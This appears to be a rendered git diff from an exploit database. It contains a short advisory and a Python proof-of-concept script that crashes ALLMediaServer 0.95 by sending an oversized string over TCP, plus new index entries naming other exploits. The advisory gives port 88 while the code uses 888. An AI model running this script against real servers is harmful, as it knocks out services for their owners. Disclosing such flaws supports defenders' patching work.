A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
|
||||||
|
|
||||||
|
|
||||||
|
2. Proof of Concept
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work.
|
||||||
|
|
||||||
|
def main():
|
||||||
|
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
|
||||||
|
s.connect(('192.168.205.131', 888))
|
||||||
|
|
||||||
|
buffer = "A" * 3000
|
||||||
|
|
||||||
|
|
||||||
|
s.send(buffer)
|
||||||
|
|
||||||
|
s.close()
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
import socket
|
||||||
|
|
||||||
|
main()
|
|
@ -5433,6 +5433,9 @@ id,file,description,date,author,type,platform,port
|
||||||
43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
|
43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
|
||||||
43380,exploits/windows/dos/43380.cpp,"Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' Double-Write Ring-0 Address Leak",2017-12-20,"Google Security Research",dos,windows,
|
43380,exploits/windows/dos/43380.cpp,"Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' Double-Write Ring-0 Address Leak",2017-12-20,"Google Security Research",dos,windows,
|
||||||
43391,exploits/windows/dos/43391.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow",2017-12-26,"Aloyce J. Makalanga",dos,windows,
|
43391,exploits/windows/dos/43391.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow",2017-12-26,"Aloyce J. Makalanga",dos,windows,
|
||||||
|
43401,exploits/hardware/dos/43401.py,"Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service",2017-12-27,LiquidWorm,dos,hardware,
|
||||||
|
43403,exploits/windows/dos/43403.py,"SysGauge Server 3.6.18 - Denial of Service",2017-12-27,"Ahmad Mahfouz",dos,windows,
|
||||||
|
43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow",2017-12-27,"Aloyce J. Makalanga",dos,windows,
|
||||||
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
|
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
|
||||||
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
|
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
|
||||||
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
|
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
|
||||||
|
@ -9235,6 +9238,7 @@ id,file,description,date,author,type,platform,port
|
||||||
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
|
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
|
||||||
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)",2017-12-04,gellin,local,windows,
|
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)",2017-12-04,gellin,local,windows,
|
||||||
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
|
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
|
||||||
|
43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
|
||||||
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
|
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
|
||||||
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
|
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
|
||||||
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
|
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
|
||||||
|
@ -37669,6 +37673,11 @@ id,file,description,date,author,type,platform,port
|
||||||
43394,exploits/php/webapps/43394.txt,"Biometric Shift Employee Management System 3.0 - Local File Disclosure",2017-12-26,"Ihsan Sencan",webapps,php,
|
43394,exploits/php/webapps/43394.txt,"Biometric Shift Employee Management System 3.0 - Local File Disclosure",2017-12-26,"Ihsan Sencan",webapps,php,
|
||||||
43395,exploits/php/webapps/43395.php,"Sendroid < 6.5.0 - SQL Injection",2017-12-26,"Onwuka Gideon",webapps,php,
|
43395,exploits/php/webapps/43395.php,"Sendroid < 6.5.0 - SQL Injection",2017-12-26,"Onwuka Gideon",webapps,php,
|
||||||
43396,exploits/php/webapps/43396.txt,"SilverStripe CMS 3.6.2 - CSV Excel Macro Injection",2017-12-26,"Ishaq Mohammed",webapps,php,
|
43396,exploits/php/webapps/43396.txt,"SilverStripe CMS 3.6.2 - CSV Excel Macro Injection",2017-12-26,"Ishaq Mohammed",webapps,php,
|
||||||
|
43398,exploits/php/webapps/43398.txt,"Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure",2017-12-27,LiquidWorm,webapps,php,
|
||||||
|
43399,exploits/php/webapps/43399.txt,"Easy!Appointments 1.2.1 - Cross-Site Scripting",2017-12-27,LiquidWorm,webapps,php,
|
||||||
|
43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware,
|
||||||
|
43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware,
|
||||||
|
43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download",2017-12-27,"Glafkos Charalambous",webapps,aspx,
|
||||||
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
|
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
|
||||||
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
|
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
|
||||||
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,
|
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue